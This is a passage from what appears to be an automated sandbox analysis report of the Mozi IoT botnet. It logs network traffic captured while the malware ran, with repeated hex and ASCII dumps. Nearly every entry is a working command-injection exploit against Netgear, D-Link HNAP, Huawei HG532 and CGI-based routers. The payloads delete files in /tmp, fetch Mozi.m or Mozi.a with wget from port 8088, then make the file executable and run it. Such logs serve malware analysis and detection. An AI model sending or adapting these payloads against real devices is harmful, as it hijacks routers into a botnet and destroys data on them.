6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 72.78.219.68:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 170.204.109.225:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 82.2.166.196:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 14.246.14.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 78.166.44.45:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 51.18.64.195:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 29.90.250.150:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 